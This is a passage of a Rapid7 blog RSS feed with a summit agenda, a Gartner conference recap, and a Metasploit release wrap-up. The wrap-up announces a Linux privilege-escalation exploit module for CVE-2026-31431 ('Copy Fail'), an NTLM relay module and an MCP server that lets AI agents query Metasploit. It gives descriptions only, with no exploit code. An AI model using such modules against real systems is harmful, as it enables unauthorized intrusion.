</span><span style='font-size: undefined;'><em>Customer Panel: How Clarity Beats Complexity</em></span><span style='font-size: undefined;'>, leaders including Debby Briggs, CISO at Netscout Systems, Raheem Daya, Chief Technology Officer at Target RWE, and Will Lambert from Culligan International share how they are simplifying their environments and focusing on outcomes rather than activity.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>From there, </span><span style='font-size: undefined;'><em>Inside the Modern SOC: Who Carries You Through an Incident</em></span><span style='font-size: undefined;'> walks through a real investigation step by step, showing how alerts are triaged, decisions are made, and outcomes are shaped under pressure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The conversation then turns to AI in </span><span style='font-size: undefined;'><em>The AI Dilemma: Automating Defense Without Surrendering Judgment</em></span><span style='font-size: undefined;'>, where the role of AI in the SOC is examined through the lens of trust, transparency, and how it supports analyst decision-making in practice.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><em>Beyond the Vulnerability List</em></span><span style='font-size: undefined;'>, the focus shifts to exposure management, looking at how organizations are moving beyond static vulnerability tracking and using exposure as an early signal to guide detection and response.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That idea of validation continues in </span><span style='font-size: undefined;'><em>Using Red Teaming to Power Preemptive MDR</em></span><span style='font-size: undefined;'>, where continuous adversary testing is used to prove detection coverage and refine response workflows before an incident occurs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The day also includes a short look at </span><span style='font-size: undefined;'><em>Rapid7: What’s New and What’s Next</em></span><span style='font-size: undefined;'>, connecting recent innovations across exposure management, MDR, and AI to how teams operate in practice.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The closing session, </span><span style='font-size: undefined;'><em>Persistence Under Pressure</em></span><span style='font-size: undefined;'>, introduces a different perspective. Former Special Forces operator Jason Fox draws on real-world experience to explore preparation, understanding the adversary, and how teams make decisions when conditions are less predictable.</span></p><h2 style="direction: ltr;">Day 2: Strategy for leaders, execution for practitioners</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The second day builds on that foundation, with two dedicated tracks designed around how security teams actually work.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For security leaders, </span><span style='font-size: undefined;'><em>The CISO’s Role in Enterprise Transformation</em></span><span style='font-size: undefined;'> brings together perspectives from Craig Robinson and Horst Moll, CISO at Miltenyi Biotec, to explore how the role of the CISO is evolving beyond technical leadership into broader organizational influence.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That is followed by </span><span style='font-size: undefined;'><em>How Exposure Insights Reframe Risk and Security Decisions</em></span><span style='font-size: undefined;'>, which looks at how leaders define priorities and align teams when exposure data is tied more closely to real-world risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><em>A CISO’s Guide to MDR Accountability and Outcomes</em></span><span style='font-size: undefined;'>, the focus moves to how effectiveness is measured, shifting from activity-based metrics toward outcomes that reflect business impact.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The leader track closes with </span><span style='font-size: undefined;'><em>Customer Panel: What CISOs Would Do Differently If Starting Today</em></span><span style='font-size: undefined;'>, featuring CISOs including Jonathan Chow of Genesys and Tony Arnold of TSB Bank, reflecting on what they would change or simplify based on experience.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For practitioners, </span><span style='font-size: undefined;'><em>Hunt or Be Hunted: Frontline Tales of Detection</em></span><span style='font-size: undefined;'> walks through a real incident, showing how analysts decide what to investigate and how signals are correlated across environments.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em>The New Rules of Detection Engineering</em></span><span style='font-size: undefined;'> builds on that with insights from Steve Edwards, Director of Threat Intelligence Detection Engineering, focusing on detection-as-code and how teams prioritize signals in practice.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><em>From Cloud Exposure to Runtime Attack</em></span><span style='font-size: undefined;'>, Shauli Rozen, CEO and Co-founder of ARMO, and Ben Hirschberg, CTO and Co-founder, walk through a cloud attack scenario to show how risks escalate and how they can be interrupted earlier.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The practitioner track closes with </span><span style='font-size: undefined;'><em>IR in Practice: Tools, Tradecraft, and Adversary-Informed Investigation</em></span><span style='font-size: undefined;'>, where Shanna Battaglia and Michael Cohen demonstrate how open-source tools and real-world workflows come together during incident response.</span></p><h2 style="direction: ltr;">Register and join the conversations</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Taken together, the agenda reflects a shift that runs through every session. Security operations are moving toward earlier decisions, better prioritization, and a clearer understanding of what matters in the moment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If you want to see how that shift is playing out across strategy, detection, and response, this is where those conversations come together.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Join us May 12–13 and explore the full agenda in practice.</span></p><p style="direction: ltr;"><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-8&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng-etos-25" target="_blank"><span style='font-size: undefined;'>Register now.</span></a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/it-walkthrough-2026-global-cybersecurity-summit-agenda</link>
      <guid isPermaLink="false">blt267cdb488a36f123</guid>
      <category><![CDATA[Events]]></category><dc:creator><![CDATA[Emma Burdett]]></dc:creator>
      <pubDate>Tue, 05 May 2026 12:20:04 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7652fa46396969f5/69a59e6cfbdb4d75ad7755a9/REQ-14706_-_1600x900px.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 05/01/2026]]></title>
      <description><![CDATA[<h2>MCP server</h2><p>This release our very own <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware layer that exposes 8 standardized tools for searching modules and pulling reconnaissance data, all built on the official <a href="https://github.com/modelcontextprotocol/ruby-sdk/">Ruby MCP SDK</a>.</p><p>This first iteration is read-only, covering modules, hosts, services, vulnerabilities, and more. Tools for module execution, session interaction, and database modifications are on the roadmap for a future release. Full details are available in the <a href="https://cdelafuente-r7.github.io/metasploit-framework/docs/using-metasploit/other/how-to-use-metasploit-mcp-server.html">documentation</a>.</p><h2>Copy Fail</h2><p>Earlier this week, details of a new and high profile Linux LPE were released alongside a public PoC. The bug, nicknamed <a href="https://copy.fail/">Copy Fail</a> and identified by <a href="https://attackerkb.com/search?q=CVE-2026-31431&amp;referrer=blog">CVE-2026-31431</a>, is a logic flaw in the cryptographic APIs exposed by the Linux Kernel. Metasploit has shipped a local exploit this week to leverage the flaw on AMD64 and AARCH64 targets with additional architectures planned for future releases. The exploit, which replaces the ‘su’ binary in the page cache with a small ELF file, allows users to specify command payloads for execution and will automatically determine the appropriate target architecture.</p><h2>New module content (3)</h2><h3>Microsoft Windows HTTP to LDAP Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21323">#21323</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_ldap</p><p>Description: This adds a new NTLM relay module that relays from HTTP to LDAP. On success, an authenticated LDAP session is opened which allows the operator to interact with the LDAP service in the context of the relayed identity.</p><h3>Copy Fail AF_ALG + authencesn Page-Cache Write</h3><p>Authors: Diego Ledda, Spencer McIntyre, Xint Code, and rootsecdev</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21395">#21395</a> contributed by <a href="https://github.com/zeroSteiner">zeroSteiner</a></p><p>Path: linux/local/cve_2026_31431_copy_fail</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-31431&amp;referrer=blog">CVE-2026-31431</a></p><p>Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.</p><h3>Linux Execute Command</h3><p>Author: Spencer McIntyre</p><p>Type: Payload (Single)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21395">#21395</a> contributed by <a href="https://github.com/zeroSteiner">zeroSteiner</a></p><p>Path: linux/aarch64/exec</p><p>Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.</p><p></p><h2>Enhancements and features (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21315">#21315</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - This adds a read-only MCP server for Metasploit capable of retrieving information from the loaded modules and database.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21352">#21352</a>, <a href="https://github.com/rapid7/metasploit-framework/pull/21353">#21353</a>, <a href="https://github.com/rapid7/metasploit-framework/pull/21355">#21355</a>, <a href="https://github.com/rapid7/metasploit-framework/pull/21359">#21359</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Improves multiple module check code messages and statuses.</li></ul><h2>Bugs fixed (0)</h2><p>None</p><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-24T18%3A36%3A28%2B01%3A00..2026-04-30T22%3A30%3A05Z%22">Pull Requests 6.4.130...6.4.131</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.130...6.4.131">Full diff 6.4.130...6.4.131</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-05-01-2026</link>
      <guid isPermaLink="false">bltcf289d0bd2b6705a</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Christopher Granleese]]></dc:creator>
      <pubDate>Fri, 01 May 2026 20:22:54 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7464fe659cab8a01/6852c358419e54d8e21c3458/blog-metasploit-wrap-up-.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Five Things we Took Away from Gartner SRM Sydney 2026]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>At this year's Gartner Security and Risk Management Summit in Sydney, Rapid7 CISO Brian Castagna joined industry CISO Nigel Hedges for a fireside chat on the decisions security leaders are actually making right now. They discussed the real decisions being made right now about budgets, burnout, AI, and perspective on consolidation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The conversation reinforced what we see across many organizations: SecOps is very much focused on protecting business resilience, enabling confident decisions by senior security leaders, and building programs that scale across people, platforms, and emerging technology. </span><span style='color:rgb(68, 71, 70);font-size: undefined;'>Let's now take a look at some of the main highlights from this year's Summit.</span></p><h2><span style='font-size: undefined;'>The business case for SecOps has shifted and boards are listening</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The ‘</span><span style='font-size: undefined;'><em>invest in security or get breached’</em></span><span style='font-size: undefined;'> pitch has run its course. Boards have heard it too many times; plus, it frames security as a cost center that only proves its value when something goes wrong.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We’re seeing it being replaced by a resilience narrative. In most incidents, the biggest business impact is operational disruption. Hours or days of downtime create immediate revenue loss, reputational damage, and perhaps worse still for some, regulatory exposure. CISOs who can connect their programs to that reality – translating incident data into business availability and financial risk – find it significantly easier to justify spend and shape investment decisions.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That shift in dynamic changes what gets measured and prioritized as well as how security leaders communicate upward to the board. Threat intelligence and kill chains still matter inside the SOC, but the ability to translate that to a clear risk narrative is fast becoming a leadership requirement in its own right.</span></p><h2><span style='font-size: undefined;'>Platform consolidation is growing, but it's not binary</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The platform-vs-best-of-breed debate was notably pragmatic. The real question is how to strike the right balance: Consolidate where it improves efficiency and visibility, retain point solutions where they materially reduce a specific risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On the ground, budget pressure has accelerated this. Fewer vendors, more integrated telemetry, and clearer operational ownership help make spend more defensible. The discussion framed consolidation through the lens of ‘</span><span style='font-size: undefined;'><em>control planes’</em></span><span style='font-size: undefined;'> (endpoint, gateway, network), with shared telemetry as the connective layer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A real-world example grounded the conversation: Build a global security program for a 5,000-person organization across 40 countries on a $3 million budget, using a selective mix of MDR, PAM, EPM, and targeted point solutions only where necessary. Throughout, the operating principle was simple in that every security investment needs to answer one question: What risk does this reduce, and importantly, what business outcome does it protect?</span></p><h2><span style='font-size: undefined;'>People remain the most difficult element of SecOps</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Technology and process can be engineered, but people? They’re much harder. That was one of the most practical observations from the session, and it resonated with every security leader in the room.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The challenge goes beyond hiring technical talent to ensure organizations are building teams with the right mix of communication skills, cognitive diversity, motivation, and endurance. A common gap seen in the SOC is that many teams are strong technically but few can articulate risk effectively to executives. That matters because the value of SecOps increasingly depends on how well teams connect activity to impact.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At the same time, burnout remains a structural issue. When experienced analysts leave, institutional knowledge leaves with them. And no tool can replace that. For leaders, this reinforces the point that people strategy is core to the overall security strategy.</span></p><h2><span style='font-size: undefined;'>AI in SecOps is getting very real, and very practical</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>After a long hype cycle, the AI conversation is now far more grounded. The most credible use cases in SecOps are about helping teams manage volume, reduce noise, and move faster with better context.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The examples discussed in the session were telling: alert-assisted triage, natural-language log querying, incident summarisation, first-draft executive communications, and eventually more automated investigation workflows. The framing that landed best was AI as a ‘</span><span style='font-size: undefined;'><em>sidearm partner’</em></span><span style='font-size: undefined;'>; a force multiplier for experienced practitioners, rather than a substitute for judgment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That distinction matters as human judgment is essential. But AI is becoming increasingly valuable for understaffed teams trying to scale operations and preserve the institutional knowledge that walks out the door when analysts move on.</span></p><h2><span style='font-size: undefined;'>Governing agentic AI begins with foundations you should already have</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>As the discussion turned to agentic AI, the focus centred on how more autonomous AI systems do introduce new governance questions, but many of the relevant controls already exist within mature security programs. Segmentation, least privilege, access management, and strong architectural boundaries remain the core defenses.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>One analogy stuck: Just as graphite rods slow a nuclear chain reaction, controls like network segmentation and access boundaries can contain and constrain agentic behavior. The organizations best positioned for AI governance are often the ones that have already invested in zero trust principles and sound identity controls.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That reframes the conversation. AI governance isn’t a separate discipline,  it’s the extension of existing security foundations into how AI systems behave, access data, and operate within defined boundaries.</span></p><h2><span style='font-size: undefined;'>What this means for the road ahead</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>If there was a unifying message, it was that the modern SecOps mandate is bigger than prevention. The industry has, to some extent, over-rotated on stopping threats and under-invested in resilience. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security leaders require programs that communicate risk in business terms, make smart technology trade-offs, support their people, and adopt AI in ways that are practical and governable. The organizations that get this right will be the ones building strong foundations and using the right mix of platform, process, and intelligence to move faster and more confidently. </span><br/><span style='font-size: undefined;'>Rapid7 is committed to being a partner to organizations looking to gain that confidence. Our </span><a href="/services/managed-detection-and-response-mdr" target="_self"><span style='font-size: undefined;'>exposure-informed MDR service</span></a><span style='font-size: undefined;'> empowers teams to adopt a more preemptive security posture by rapidly identifying high-impact exposures that could be imminent breach targets. Teams can also leverage expanded capabilities in data security posture management (DSPM) and compliance to help fortify assessment, prioritization, and response capabilities so they can further preempt attacks across the modern attack surface.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/it-5-things-gartner-srm-sydney-2026</link>
      <guid isPermaLink="false">blt71ca5e4ec0fd2ade</guid>
      <category><![CDATA[Events]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 29 Apr 2026 23:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3cc8c945f314ec1f/68b9a045a7d14357b3ba893b/blog-hero-texture-lines.jpg" medium="image" />
    </item>
  </channel>
</rss>